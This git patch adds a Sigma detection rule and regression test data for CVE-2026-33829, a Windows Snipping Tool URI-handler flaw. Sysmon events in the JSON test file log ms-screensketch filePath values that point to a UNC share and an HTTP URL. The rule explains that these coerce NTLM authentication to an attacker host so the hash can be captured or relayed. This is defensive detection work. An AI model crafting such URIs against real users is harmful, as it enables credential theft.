From 3305d11c890dcab255007366f1aaf4153d47f191 Mon Sep 17 00:00:00 2001
From: Swachchhanda Shrawan Poudel
 <87493836+swachchhanda000@users.noreply.github.com>
Date: Tue, 28 Apr 2026 04:43:55 +0545
Subject: [PATCH] Merge PR #5942 from @swachchhanda000 - Add `Potential
 CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI`

new: Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI

---------

Co-authored-by: Nasreddine Bencherchali <monsteroffire2@gmail.com>
---
 .../7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx | Bin 0 -> 69632 bytes
 .../7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json | 132 ++++++++++++++++++
 .../info.yml                                  |  13 ++
 ...oc_creation_win_exploit_cve_2026_33829.yml |  36 +++++
 4 files changed, 181 insertions(+)
 create mode 100644 regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx
 create mode 100644 regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json
 create mode 100644 regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml
 create mode 100644 rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829.yml

diff --git a/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx
new file mode 100644
index 0000000000000000000000000000000000000000..63ac9a9db85e33191353115cc2f5cdeaba64c7d3
GIT binary patch
literal 69632
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

literal 0
HcmV?d00001

diff --git a/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json
new file mode 100644
index 000000000..169721b1e
--- /dev/null
+++ b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json
@@ -0,0 +1,132 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2026-04-20T10:00:35.646624Z"
+        }
+      },
+      "EventRecordID": 86918,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2026-04-20 10:00:35.640",
+      "ProcessGuid": "0197231E-F943-69E5-A527-000000000800",
+      "ProcessId": 6180,
+      "Image": "C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe",
+      "FileVersion": "-",
+      "Description": "-",
+      "Product": "-",
+      "Company": "-",
+      "OriginalFileName": "-",
+      "CommandLine": "\"C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe\" ms-screensketch:edit?&filePath=%%5C%%5C172.16.137.159%%5Cshare",
+      "CurrentDirectory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\147.0.3912.72\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-7F52-69E4-50D1-E83300000000",
+      "LogonId": "0x33e8d150",
+      "TerminalSessionId": 2,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=FF9D1ED3795B9AD94F2390D5E5DA5905,SHA256=A80CB394D251F781DBD5FFB889D38FDD2095ADE63110578CA62F62CF795B7538,IMPHASH=3D4392A18BB23C56D311A2D64B6E5BA0",
+      "ParentProcessGuid": "0197231E-8126-69E4-8326-000000000800",
+      "ParentProcessId": 6428,
+      "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
+      "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2026-04-20T10:00:40.222623Z"
+        }
+      },
+      "EventRecordID": 86921,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2026-04-20 10:00:40.217",
+      "ProcessGuid": "0197231E-F948-69E5-A727-000000000800",
+      "ProcessId": 16492,
+      "Image": "C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe",
+      "FileVersion": "-",
+      "Description": "-",
+      "Product": "-",
+      "Company": "-",
+      "OriginalFileName": "-",
+      "CommandLine": "\"C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe\" ms-screensketch:edit?&filePath=http://172.16.137.159:8000/file.png",
+      "CurrentDirectory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\147.0.3912.72\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-7F52-69E4-50D1-E83300000000",
+      "LogonId": "0x33e8d150",
+      "TerminalSessionId": 2,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=FF9D1ED3795B9AD94F2390D5E5DA5905,SHA256=A80CB394D251F781DBD5FFB889D38FDD2095ADE63110578CA62F62CF795B7538,IMPHASH=3D4392A18BB23C56D311A2D64B6E5BA0",
+      "ParentProcessGuid": "0197231E-8126-69E4-8326-000000000800",
+      "ParentProcessId": 6428,
+      "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
+      "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}
diff --git a/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml
new file mode 100644
index 000000000..8dd08fcb3
--- /dev/null
+++ b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml
@@ -0,0 +1,13 @@
+id: baeec889-f3aa-4a10-b913-71e94f741066
+description: N/A
+date: 2026-04-20
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: 7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d
+      title: Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 2
+      path: regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx
diff --git a/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829.yml b/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829.yml
new file mode 100644
index 000000000..296d28a6b
--- /dev/null
+++ b/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829.yml
@@ -0,0 +1,36 @@
+title: Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
+id: 7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d
+status: test
+description: |
+    Detects potential exploitation of CVE-2026-33829, a vulnerability in the Windows Snipping Tool URI handler (ms-screensketch:).
+    An attacker can abuse the 'filePath' parameter to supply a UNC path or HTTP URL, causing SnippingTool.exe to initiate a connection to a remote resource.
+    When a UNC path is used (e.g. \\attacker.com\share), this triggers an outbound NTLM authentication attempt, allowing the attacker to capture or relay the victim's Net-NTLMv2 hash.
+    HTTP-based paths may result in remote file loading or server-side request forgery (SSRF)-style access.
+    The URI can be delivered via a malicious hyperlink, phishing email, or web page.
+references:
+    - https://x.com/BlackArrowSec/status/2044374743491424508
+    - https://x.com/SBousseaden/status/2044417029721997635
+author: Samir Bousseaden, Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2026-04-28
+tags:
+    - attack.credential-access
+    - attack.t1187
+    - detection.emerging-threats
+    - cve.2026-33829
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection:
+        Image|endswith: '\SnippingTool.exe'
+        CommandLine|contains:
+            # '\\\\'  = literal double backslash (UNC path start); '%5C' and '%%5C' are URL-encoded variations of the same backslash character
+            - 'ms-screensketch:edit?&filePath=\\\\'
+            - 'ms-screensketch:edit?&filePath=%%5C'
+            - 'ms-screensketch:edit?&filePath=%5C'
+            - 'ms-screensketch:edit?&filePath=http'
+    condition: selection
+falsepositives:
+    - Unknown
+level: high
+regression_tests_path: regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml